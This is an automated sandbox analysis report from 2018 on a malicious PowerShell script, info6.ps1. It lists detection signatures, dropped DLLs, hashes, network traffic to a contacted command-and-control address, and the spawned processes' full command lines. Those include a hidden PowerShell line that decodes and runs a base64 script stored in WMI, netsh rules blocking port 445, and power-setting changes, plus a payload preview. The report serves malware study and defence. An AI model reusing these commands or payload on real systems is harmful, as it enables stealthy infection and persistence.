ID: 64868 Sample Name: info6.ps1 Cookbook: default.jbs Time: 20:26:29 Date: 20/06/2018 Version: 22.0.0 Table of Contents
Table of Contents 2 Analysis Report 4 Overview 4 General Information 4 Detection 4 Confidence 5 Classification 5 Analysis Advice 6 Signature Overview 6 AV Detection: 7 Networking: 7 Boot Survival: 7 Persistence and Installation Behavior: 7 Data Obfuscation: 7 Spreading: 7 System Summary: 7 HIPS / PFW / Operating System Protection Evasion: 8 Anti Debugging: 8 Malware Analysis System Evasion: 8 Hooking and other Techniques for Hiding and Protection: 8 Lowering of HIPS / PFW / Operating System Security Settings: 8 Language, Device and Operating System Detection: 8 Behavior Graph 8 Simulations 9 Behavior and APIs 9 Antivirus Detection 9 Initial Sample 9 Dropped Files 9 Unpacked PE Files 9 Domains 10 URLs 10 Yara Overview 10 Initial Sample 10 PCAP (Network Traffic) 10 Dropped Files 10 Memory Dumps 10 Unpacked PEs 10 Joe Sandbox View / Context 10 IPs 10 Domains 10 ASN 10 Dropped Files 10 Screenshots 11 Startup 11 Created / dropped Files 12 Contacted Domains/Contacted IPs 15 Contacted Domains 16 Contacted URLs 16 Contacted IPs 16 Public 16 Static File Info 16 General 16 File Icon 17
Copyright Joe Security LLC 2018 Page 2 of 28 Network Behavior 17 TCP Packets 17 ICMP Packets 17 HTTP Request Dependency Graph 17 HTTP Packets 17 Code Manipulations 18 Statistics 18 Behavior 18 System Behavior 18 Analysis Process: powershell.exe PID: 3384 Parent PID: 2984 18 General 18 File Activities 19 File Created 19 File Deleted 19 File Written 19 File Read 21 Registry Activities 23 Key Value Created 23 Analysis Process: netsh.exe PID: 3604 Parent PID: 3384 23 General 23 Registry Activities 23 Analysis Process: netsh.exe PID: 3620 Parent PID: 3384 23 General 23 Registry Activities 23 Analysis Process: netsh.exe PID: 3648 Parent PID: 3384 24 General 24 Analysis Process: netsh.exe PID: 3696 Parent PID: 3384 24 General 24 Analysis Process: netsh.exe PID: 3716 Parent PID: 3384 24 General 24 Analysis Process: netsh.exe PID: 3748 Parent PID: 3384 24 General 25 Analysis Process: schtasks.exe PID: 3940 Parent PID: 3384 25 General 25 Analysis Process: powercfg.exe PID: 3952 Parent PID: 3384 25 General 25 Analysis Process: powercfg.exe PID: 3960 Parent PID: 3384 25 General 25 Analysis Process: powercfg.exe PID: 3968 Parent PID: 3384 26 General 26 Analysis Process: NETSTAT.EXE PID: 3980 Parent PID: 3384 26 General 26 Analysis Process: csc.exe PID: 2140 Parent PID: 3384 26 General 26 Analysis Process: NETSTAT.EXE PID: 2180 Parent PID: 3384 26 General 27 Analysis Process: cvtres.exe PID: 2212 Parent PID: 2140 27 General 27 Analysis Process: powershell.exe PID: 2524 Parent PID: 3384 27 General 27 Analysis Process: NETSTAT.EXE PID: 2696 Parent PID: 3384 27 General 27 Analysis Process: csc.exe PID: 2644 Parent PID: 2524 28 General 28 Analysis Process: cvtres.exe PID: 2060 Parent PID: 2644 28 General 28 Disassembly 28 Code Analysis 28
Copyright Joe Security LLC 2018 Page 3 of 28 Analysis Report
Overview
General Information
Joe Sandbox Version: 22.0.0 Analysis ID: 64868 Start time: 20:26:29 Joe Sandbox Product: CloudBasic Start date: 20.06.2018 Overall analysis duration: 0h 5m 54s Hypervisor based Inspection enabled: false Report type: light Sample file name: info6.ps1 Cookbook file name: default.jbs Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java 8.0.1440.1) Number of analysed new started processes analysed: 24 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies HCA enabled EGA enabled HDC enabled Analysis stop reason: Timeout Detection: MAL Classification: mal92.winPS1@37/20@0/1 HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 EGA Information: Failed HDC Information: Failed Cookbook Comments: Adjust boot time Correcting counters for adjusted boot time Found application associated with file extension: .ps1 Warnings: Show All Exclude process from analysis (whitelisted): WmiPrvSE.exe, WmiApSrv.exe, conhost.exe, dllhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe, csc.exe, powershell.exe, csc.exe
Detection
Strategy Score Range Reporting Detection
Copyright Joe Security LLC 2018 Page 4 of 28 Strategy Score Range Reporting Detection
Threshold 92 0 - 100 Report FP / FN
Confidence
Strategy Score Range Further Analysis Required? Confidence
Threshold 5 0 - 5 false
Classification
Copyright Joe Security LLC 2018 Page 5 of 28 Ransomware
Miner Spreading
mmaallliiiccciiioouusss
malicious
Evader Phishing
sssuusssppiiiccciiioouusss
suspicious
cccllleeaann
clean
Exploiter Banker
Spyware Trojan / Bot
Adware
Analysis Advice
Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Signature Overview
• AV Detection • Networking • Boot Survival • Persistence and Installation Behavior • Data Obfuscation • Spreading • System Summary • HIPS / PFW / Operating System Protection Evasion • Anti Debugging • Malware Analysis System Evasion
Copyright Joe Security LLC 2018 Page 6 of 28 • Hooking and other Techniques for Hiding and Protection • Lowering of HIPS / PFW / Operating System Security Settings • Language, Device and Operating System Detection
Click to jump to signature section
AV Detection:
Antivirus detection for dropped file
Networking:
Detected TCP or UDP traffic on non-standard ports
Uses known network protocols on non-standard ports
Uses netstat to query active network connections and open ports
HTTP GET or POST without a user agent
Downloads files from webservers via HTTP
Urls found in memory or binary data
Boot Survival:
Uses schtasks.exe or at.exe to add and modify task schedules
Creates or modifies windows services
Persistence and Installation Behavior:
Drops PE files
Data Obfuscation:
Suspicious powershell command line found
Compiles C# or VB.Net code
Spreading:
Creates COM task schedule object (often to register a task for autostart)
Enumerates the file system
System Summary:
Powershell connects to network
Uses powercfg.exe to modify the power settings
Abnormal high CPU Usage
Creates mutexes
PE file does not import any functions
Classification label
Creates files inside the user directory Copyright Joe Security LLC 2018 Page 7 of 28 Creates temporary files
Found command line output
Parts of this applications are using the .NET runtime (Probably coded in C#)
Queries process information (via WMI, Win32_Process)
Reads ini files
Reads software policies
Spawns processes
Uses an in-process (OLE) Automation server
Found graphical window changes (likely an installer)
Uses Microsoft Silverlight
Submission file is bigger than most known malware samples
Uses new MSVCR Dlls
Binary contains paths to debug symbols
HIPS / PFW / Operating System Protection Evasion:
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Anti Debugging:
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Enables debug privileges
Creates guard pages, often used to prevent reverse engineering and debugging
Malware Analysis System Evasion:
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Enumerates the file system
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries a list of all running processes
Hooking and other Techniques for Hiding and Protection:
System process connects to network (likely due to code injection or exploit)
Uses known network protocols on non-standard ports
Disables application error messsages (SetErrorMode)
Lowering of HIPS / PFW / Operating System Security Settings:
Modifies power options to not sleep / hibernate
Uses netsh to modify the Windows network and firewall settings
Language, Device and Operating System Detection:
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Queries the cryptographic machine GUID
Behavior Graph
Copyright Joe Security LLC 2018 Page 8 of 28 Hide Legend Behavior Graph
ID: 64868 Legend:
Sample: info6.ps1 Process Startdate: 20/06/2018 Signature Architecture: WINDOWS Score: 92 Created File DNS/IP Info Detected TCP or UDP Antivirus detection Suspicious powershell traffic on non-standard 6 other signatures started for dropped file command line found ports Is Dropped
Is Windows Process
powershell.exe Number of created Registry Values
13 12 Number of created Files
Visual Basic
87.121.98.215, 49163, 8000 Delphi TAMATIYA-ASBG Bulgaria Java started started started .Net C# or VB.NET Queries sensitive network System process connects Detected TCP or UDP adapter information Suspicious powershell to network (likely due traffic on non-standard (via WMI, Win32_NetworkAdapter, 2 other signatures command line found to code injection or ports often done to detect exploit) C, C++ or other language virtual machines) Is malicious
powershell.exe csc.exe netsh.exe
12 other processes
49
dropped
started C:\Users\user\AppData\Local\...\rfy2neso.dll, PE32 started
csc.exe cvtres.exe
dropped
C:\Users\user\AppData\Local\...\cvkkx-1q.dll, PE32 started
cvtres.exe
Simulations
Behavior and APIs
Time Type Description 20:26:45 API Interceptor 142x Sleep call for process: powershell.exe modified 20:27:27 API Interceptor 12x Sleep call for process: netsh.exe modified 20:27:43 API Interceptor 2x Sleep call for process: schtasks.exe modified 20:27:44 API Interceptor 3x Sleep call for process: powercfg.exe modified 20:27:45 API Interceptor 3x Sleep call for process: NETSTAT.EXE modified 20:28:07 API Interceptor 2x Sleep call for process: cvtres.exe modified
Antivirus Detection
Initial Sample
Source Detection Scanner Label Link info6.ps1 5% virustotal Browse info6.ps1 8% metadefender Browse
Dropped Files
Source Detection Scanner Label Link C:\Users\user\AppData\Local\Temp\rfy2neso.dll 100% Avira HEUR/AGEN.1019608 C:\Users\user\AppData\Local\Temp\cvkkx-1q.dll 100% Avira HEUR/AGEN.1019608
Unpacked PE Files Copyright Joe Security LLC 2018 Page 9 of 28 No Antivirus matches
Domains
No Antivirus matches
URLs
No Antivirus matches
Yara Overview
Initial Sample
No yara matches
PCAP (Network Traffic)
No yara matches
Dropped Files
No yara matches
Memory Dumps
No yara matches
Unpacked PEs
No yara matches
Joe Sandbox View / Context
IPs
Associated Sample Match Name / URL SHA 256 Detection Link Context 87.121.98.215 info3.ps1 e92251cb5557d832c64143e30c4 malicious Browse 87.121.98. 948781f60e7d19deac2fcd3b6776 215:8000/ver.txt 1abdd2357
Domains
No context
ASN
Associated Sample Match Name / URL SHA 256 Detection Link Context TAMATIYA-ASBG info3.ps1 e92251cb5557d832c64143e30c4 malicious Browse 87.121.98.215 948781f60e7d19deac2fcd3b6776 1abdd2357 .exe 777258a741a9c250b16d13a30e1 malicious Browse 79.124.59.10 bdf657f7d95c50499de73ebb4800 d1c0fe211
Dropped Files
No context
Copyright Joe Security LLC 2018 Page 10 of 28 Screenshots
Startup
Copyright Joe Security LLC 2018 Page 11 of 28 System is w7 powershell.exe (PID: 3384 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\info6.ps1' MD5: 92F44E405DB16AC55D97E3BFE3B132FA) netsh.exe (PID: 3604 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add policy name=netbc MD5: 784A50A6A09C25F011C3143DDD68E729) netsh.exe (PID: 3620 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add filterlist name=block MD5: 784A50A6A09C25F011C3143DDD68E729) netsh.exe (PID: 3648 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add filteraction name=block action=block MD5: 784A50A6A09C25F011C3143DDD68E729) netsh.exe (PID: 3696 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445 protocol=tcp descri ption=445 MD5: 784A50A6A09C25F011C3143DDD68E729) netsh.exe (PID: 3716 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static add rule name=block policy=netbc filterlist=block filteraction=block MD5: 784A50A6A09C25F011C3143DDD68E729) netsh.exe (PID: 3748 cmdline: 'C:\Windows\system32\netsh.exe' ipsec static set policy name=netbc assign=y MD5: 784A50A6A09C25F011C3143DDD68E729) schtasks.exe (PID: 3940 cmdline: 'C:\Windows\system32\schtasks.exe' /delete /tn yastcat /f MD5: 2003E9B15E1C502B146DAD2E383AC1E3) powercfg.exe (PID: 3952 cmdline: 'C:\Windows\system32\powercfg.exe' /CHANGE -standby-timeout-ac 0 MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F) powercfg.exe (PID: 3960 cmdline: 'C:\Windows\system32\powercfg.exe' /CHANGE -hibernate-timeout-ac 0 MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F) powercfg.exe (PID: 3968 cmdline: 'C:\Windows\system32\powercfg.exe' -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000 MD5: 98E7E971AB21A6EDD2323C0FB37B9A0F) NETSTAT.EXE (PID: 3980 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp MD5: 32297BB17E6EC700D0FC869F9ACAF561) csc.exe (PID: 2140 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\rfy2neso.cmdline' MD5: 0A1C81BDCB030222A0B0A652B2C89D8D) cvtres.exe (PID: 2212 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL ~1\AppData\Local\Temp\RES501D.tmp' 'c:\Users\user\AppData\Local\Temp\CSC4E3C.tmp' MD5: 200FC355F85ECD4DB77FB3CAB2D01364) NETSTAT.EXE (PID: 2180 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp MD5: 32297BB17E6EC700D0FC869F9ACAF561) powershell.exe (PID: 2524 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden '$mon = ([WmiClass] 'root\default:coredpussvr').P roperties['mon'].Value;$funs = ([WmiClass] 'root\default:coredpussvr').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($fu ns)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')' MD5: 92F44E405DB16AC55D97E3BFE3B132FA) csc.exe (PID: 2644 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cvkkx-1q.cmdline' MD5: 0A1C81BDCB030222A0B0A652B2C89D8D) cvtres.exe (PID: 2060 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\HERBBL ~1\AppData\Local\Temp\RESD500.tmp' 'c:\Users\user\AppData\Local\Temp\CSCD405.tmp' MD5: 200FC355F85ECD4DB77FB3CAB2D01364) NETSTAT.EXE (PID: 2696 cmdline: 'C:\Windows\system32\NETSTAT.EXE' -anop tcp MD5: 32297BB17E6EC700D0FC869F9ACAF561) cleanup
Created / dropped Files
C:\Users\HERBBL~1\AppData\Local\Temp\RES501D.tmp Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe File Type: data Size (bytes): 2064 Entropy (8bit): 2.4206455899570347 Encrypted: false MD5: 4E92534C4283342787DF59528CC52F65 SHA1: CA162F5398E1213CB78094AB196EA96AEE43A751 SHA-256: 18673E6AC3B3F15D922DA5C00EC105B8105B6C5AAFD4D74AF6080C7C100AF478 SHA-512: 456BF21CB7BD9EE8A8C2D1D195076C03E13E73476AA3303E278A267261E04C26712D1C26D1C371948BB236E7897 4A1850CD95A42242B11F8C77F0C4AD697232F Malicious: false Reputation: low
C:\Users\HERBBL~1\AppData\Local\Temp\RESD500.tmp Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe File Type: data Size (bytes): 2064 Entropy (8bit): 2.434136513000324 Encrypted: false MD5: 312EDD968BD35DD5811FB93F0091FC79 SHA1: 40DE4BA3D25B19217691E4B2C5011E4F142F7FD9 SHA-256: EB881F2E76590C94BCEBF218C35C6EAB4AEB520ACACBD38A504EDEE270BC782A SHA-512: E0055AF80D607865D6E006D7B764D6F52A3E3A1E8D15172D7C8AB62DB8884167546648BC2E2556667972E1CE2420 3A7B9937AB3F68529C1118C661CEEF1A1790 Malicious: false Reputation: low
C:\Users\user\AppData\Local\Temp\CSC4E3C.tmp Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe File Type: MSVC .res Size (bytes): 652 Entropy (8bit): 3.078257301127696 Encrypted: false MD5: 1CB3759EAB892AFB3D135D9881239802 SHA1: D7BD5EA08CEF547380471029884D3FEC9323E0EC
Copyright Joe Security LLC 2018 Page 12 of 28 C:\Users\user\AppData\Local\Temp\CSC4E3C.tmp SHA-256: 2933D6A58EB97383F747F900E645E00B3F4AD0E814856B65B11CAA5E439CE26B SHA-512: F38B435EA9B13D51E88160E4610C206AEC18F447AA62B4754B93408AD7B81327EA46356899F9726E5D4F30283709 9C99E1A974FC872B0D78519C9603B3C4B30E Malicious: false Reputation: low
C:\Users\user\AppData\Local\Temp\CSCD405.tmp Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe File Type: MSVC .res Size (bytes): 652 Entropy (8bit): 3.139068505991067 Encrypted: false MD5: C8B7813DA081BCEC06604076284D7DDD SHA1: C41BD7C5A7C64D09AC2B4E757E0811DF4541F5CC SHA-256: 202C26850D070DF428E9AFC3DD51713835CA864F89742233AE26A2F099C6D0CE SHA-512: 1997A97076F22D034AB16E4AA14DCC08BA43D21F25F4AE8BF36BEEFD28771251CB45CA05AAB76FE77D53CA373 77F1E65F3EE85C330B9684A7618BCB53AC362C5 Malicious: false Reputation: low
C:\Users\user\AppData\Local\Temp\cvkkx-1q.0.cs Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators Size (bytes): 5826 Entropy (8bit): 4.9118391565359545 Encrypted: false MD5: BE45C5DB7A9A66F35401E2B00BBDB856 SHA1: 354DC7D3F4D6F80359B0BA99081C0B6705F49480 SHA-256: 1CEEFFDD10ECE58A1B0F298BF4BD2CA65E1EF5CD50248F89F89870E21C7E5E3B SHA-512: A33F9D0FCA8ED8513CB9F16155C124C3259C56D7C8B90B6376095672288852B275B2ECA7006D7CB1A45A5EBE600 075D459DFF71C21C181B26D0E66034AB0DF4F Malicious: false Reputation: low
C:\Users\user\AppData\Local\Temp\cvkkx-1q.cmdline Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators Size (bytes): 327 Entropy (8bit): 5.379194927430392 Encrypted: false MD5: 07D8A72FAE41181F605C7DD7143466B5 SHA1: 969CC5805DAE3691E814DC63125049BCBEAA0772 SHA-256: 120909A05012EBA5EA8D338EA080C99AC017347644A34401DC41639FAC4C0675 SHA-512: C3A7AFFDC36DEF055235EF3A6C0B06C490108C8F668AA99C7F2E71C7472C6882912174C2309B5A4FFCB908837D6 6E3ED05F99E617C6465AEEB6E0B7877808342 Malicious: false Reputation: low
C:\Users\user\AppData\Local\Temp\cvkkx-1q.dll
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows Size (bytes): 6656 Entropy (8bit): 4.225812081368049 Encrypted: false MD5: EEE0102FD19D235F85AC604E3C9BB27C SHA1: 603EBD07E1ED56FBFB53FF09031F116B2CBC2392 SHA-256: 2AFA89BD9BB38FB1DAFDB95F0F54DEF3A31A01CA2E6463AB07DA143CD11C3533 SHA-512: 99330DCB43FD47DEC4371A44B1B4FE8957A7E9E568898C7F54B4A2AC62A40B9FD5ACDE5E1EC6DA108C9019AD0 CA8737ECCC713A57476B527AAD7B606B881CC44 Malicious: true Antivirus: Antivirus: Avira, Detection: 100%, Browse
C:\Users\user\AppData\Local\Temp\cvkkx-1q.out Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators Size (bytes): 422
Copyright Joe Security LLC 2018 Page 13 of 28 C:\Users\user\AppData\Local\Temp\cvkkx-1q.out Entropy (8bit): 5.467206418058541 Encrypted: false MD5: 1EC4D08AF533EE6B25E49038FD2D696F SHA1: 032E90F7D85BB3E1A9E809F993B398E33818E576 SHA-256: 83A622A4241590271D8E84AB3A5A2518ABF574918662080653FDCFAD61BAEA1D SHA-512: E8356B7FC2C404850F44C04EBEBC23D0A73983FC6E8FF7D22DD25DEB44D4C92BF0B8902C77A26BAA4A9FBAA8 E1FCB9A696D2BB8036B4237D265AB6571C17E18B Malicious: false
C:\Users\user\AppData\Local\Temp\cvkkx-1q.pdb Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe File Type: data Size (bytes): 25005 Entropy (8bit): 1.6181460620684103 Encrypted: false MD5: 1721A66D3F20ECC251B6CDEBD4C8C13B SHA1: 36326B08FA246630575553DD766790C38238D766 SHA-256: 63756B9381EFDBD3FB8DDC6CF32834448F5052B1554930B8CB719F30C0639811 SHA-512: 0924A159683B6D7404854D91F70459A7F722F8DF74B4F1B8D2EA60098939ADEDBBFB6DC4F45950F960060D1C3A8 FD91FBD9A9C1C6C4B409AC5D07DF2ABAAC1C0 Malicious: false
C:\Users\user\AppData\Local\Temp\rfy2neso.0.cs Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators Size (bytes): 5826 Entropy (8bit): 4.9118391565359545 Encrypted: false MD5: BE45C5DB7A9A66F35401E2B00BBDB856 SHA1: 354DC7D3F4D6F80359B0BA99081C0B6705F49480 SHA-256: 1CEEFFDD10ECE58A1B0F298BF4BD2CA65E1EF5CD50248F89F89870E21C7E5E3B SHA-512: A33F9D0FCA8ED8513CB9F16155C124C3259C56D7C8B90B6376095672288852B275B2ECA7006D7CB1A45A5EBE60 0075D459DFF71C21C181B26D0E66034AB0DF4F Malicious: false
C:\Users\user\AppData\Local\Temp\rfy2neso.cmdline Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators Size (bytes): 327 Entropy (8bit): 5.288875891478697 Encrypted: false MD5: 66144B5F92CA3DCD1E57021D5979733E SHA1: F52986F730D2CAD733F475E60252409623197124 SHA-256: 57CEDEF208DBA8BE4BCDFD4127CC064B9EA71B445D682A187A08226467691006 SHA-512: A09C8BFA417DD4D6643BFFC3E1039124ED847ED54075B8142F574C52B936DAA747D66678544EF804B7EFCCB853 5902032DF40A51695C61943DC815B8E3D07212 Malicious: false
C:\Users\user\AppData\Local\Temp\rfy2neso.dll
Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows Size (bytes): 6656 Entropy (8bit): 4.220611172320333 Encrypted: false MD5: F210C481FCE0812A26BEE5CE3FF11577 SHA1: C2FEFD9FD9F982B60614E552EA5FCF574C513B82 SHA-256: 96401493A24B56D20E42DE79D8AF39ED599E1D7FF9515EA8E4F08CE3E3173472 SHA-512: 50E5BE148B0F8C72A0FE1BD0C73B6C3D1F99ABAA162F6155B4AE55C2F8F73041E0566B0D2D360DC3159E843366 C08E7C803F0483A0294B8BCFB3E62654F25405 Malicious: true Antivirus: Antivirus: Avira, Detection: 100%, Browse
C:\Users\user\AppData\Local\Temp\rfy2neso.out Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe File Type: ASCII text, with CRLF line terminators Size (bytes): 198
Copyright Joe Security LLC 2018 Page 14 of 28 C:\Users\user\AppData\Local\Temp\rfy2neso.out Entropy (8bit): 4.894444435447009 Encrypted: false MD5: 182738883BFDFB548627BEC18305C7EE SHA1: FD5A8D41B96844985C0DC21116CFA689CED8AABE SHA-256: 5026CA6D4A10F43342AC0AD1E7536686D1E32DE5EAA6E9478BDA11FCA1B78622 SHA-512: 9A029DF52BAE31B8E69BADECA6AD4A8DA19D12557EDFCC2A85DD0C85EBEA9090E79CAD09DC4DCF9D905D736 28FA41FDD7D0A2577D4B4A716DA0A6EEA02ADF3D0 Malicious: false
C:\Users\user\AppData\Local\Temp\rfy2neso.pdb Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe File Type: data Size (bytes): 25005 Entropy (8bit): 1.6151888280775484 Encrypted: false MD5: 775B77D4BD8C0DB6EBA3B0F3753F87BD SHA1: 0D16432D78DCCB4C0C6E9D8F518E09615554EFC0 SHA-256: 57E2911B535235CC7626C5937B975AD0BC8A15D0B61D51D241910403610E5CAE SHA-512: DDD83CE1F450EA43725474529B46B3EF2B56949F6231191A601C5DA4E1B8151DD84402F466DAF7DECC5C47058B ABD72FE2C14E8C560830879148C620A37B3A2E Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2QNP9L1LI3OJHOCM4WD6.temp Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Size (bytes): 8016 Entropy (8bit): 3.568699490955571 Encrypted: false MD5: 178E171AA9C7B8FE0BFE7FBED6EFE82C SHA1: 3656D8D111B1CAA69EB106AF479251B5B675ABF7 SHA-256: 7936F4C0D68528DF97C96C33C65A5CFD8DA5A763F58ADD86529E8A361B2590DF SHA-512: 506B4081DC66467D70AF97F5578587F9412F5B163916672277AF1D1315B56BB398021BB2A18D11B4DC69081B0F838 340AB6EDC594DC7523F4DC8DAFE1129ADAD Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C1CSPJYK7FU47I8OU5ZB.temp Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Type: data Size (bytes): 8016 Entropy (8bit): 3.568699490955571 Encrypted: false MD5: 178E171AA9C7B8FE0BFE7FBED6EFE82C SHA1: 3656D8D111B1CAA69EB106AF479251B5B675ABF7 SHA-256: 7936F4C0D68528DF97C96C33C65A5CFD8DA5A763F58ADD86529E8A361B2590DF SHA-512: 506B4081DC66467D70AF97F5578587F9412F5B163916672277AF1D1315B56BB398021BB2A18D11B4DC69081B0F838 340AB6EDC594DC7523F4DC8DAFE1129ADAD Malicious: false
stdout Process: C:\Windows\System32\NETSTAT.EXE File Type: ASCII text, with CRLF line terminators Size (bytes): 855 Entropy (8bit): 3.572884291068745 Encrypted: false MD5: 13F43918C1C2DDB8CD83C6C357795F3A SHA1: 2E506707849FB6E5619E248AC36DFF4B7FA60D30 SHA-256: FB9AF23D55D2C1C9ADE9BCA947EE53077BD900BC73A43D2E6EC2E591036E9434 SHA-512: C0BD92E36D560028241AED41C4DB0B6E30D443A687132B27F2AFCB11FB18C6C7D36DB583A7EBD8CEF0C32400C 5E31F4A7F5FC32DCED9568A53C80976D034D559 Malicious: false
Contacted Domains/Contacted IPs
Copyright Joe Security LLC 2018 Page 15 of 28 Contacted Domains
No contacted domains info
Contacted URLs
Name Process http://87.121.98.215:8000/ver.txt C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Contacted IPs
No. of IPs < 25% 25% < No. of IPs < 50% 50% < No. of IPs < 75% 75% < No. of IPs
Public
IP Country Flag ASN ASN Name Malicious 87.121.98.215 Bulgaria 50360 TAMATIYA-ASBG true
Static File Info
General
File type: ASCII text, with very long lines, with no line terminators Entropy (8bit): 5.463131940959833 TrID: File name: info6.ps1 File size: 4262380 MD5: 43a1902a3e565b60ae44a61f7f83cb87 SHA1: 47740f72441b91d48cebc4bbb1cb104e3d921c15 SHA256: c08700057afe58bcbb1661d68f80ea3fcd04e30d5f2e789 d8ade0ae2dbff30db SHA512: 250cf1df4286da78a46bfee6f0644e9609906cea45b14ab 8a4ecb460e73f6ece65818a7f9873bf404dbee6e6e448d5 ca07207a31e9e4d40ac07a32a2128a3d44 File Content Preview: $fa = "VWoBVUFQSIPsIL/EXBlt6DUAAABIjU0QTTHJvz RGzK/oJAAAAEiDxECFwHSjSItFIIB4GgF0CUiJAEiJQA jrkFhbXl9BXkFfw+gCAAAA/+BTUVZBi0c8QYuEB4gAA ABMAfhQi0gYi1ggTAH7/8mLNItMAf7oHwAAADn4de9Y i1gkTAH7ZosMS4tYHEwB+4sEi0wB+F5ZW8NSMcCZr MHKDQHChcB19pJaw1VTV1ZBV0mLKEyLfQhSXkyJ
Copyright Joe Security LLC 2018 Page 16 of 28 File Icon
Network Behavior
TCP Packets
Timestamp Source Port Dest Port Source IP Dest IP Jun 20, 2018 20:28:18.411144018 CEST 49163 8000 192.168.2.2 87.121.98.215 Jun 20, 2018 20:28:18.456084967 CEST 8000 49163 87.121.98.215 192.168.2.2 Jun 20, 2018 20:28:18.456218958 CEST 49163 8000 192.168.2.2 87.121.98.215 Jun 20, 2018 20:28:18.456597090 CEST 49163 8000 192.168.2.2 87.121.98.215 Jun 20, 2018 20:28:18.501066923 CEST 8000 49163 87.121.98.215 192.168.2.2 Jun 20, 2018 20:28:18.501296997 CEST 8000 49163 87.121.98.215 192.168.2.2 Jun 20, 2018 20:28:18.742770910 CEST 8000 49163 87.121.98.215 192.168.2.2 Jun 20, 2018 20:28:18.742876053 CEST 49163 8000 192.168.2.2 87.121.98.215
ICMP Packets
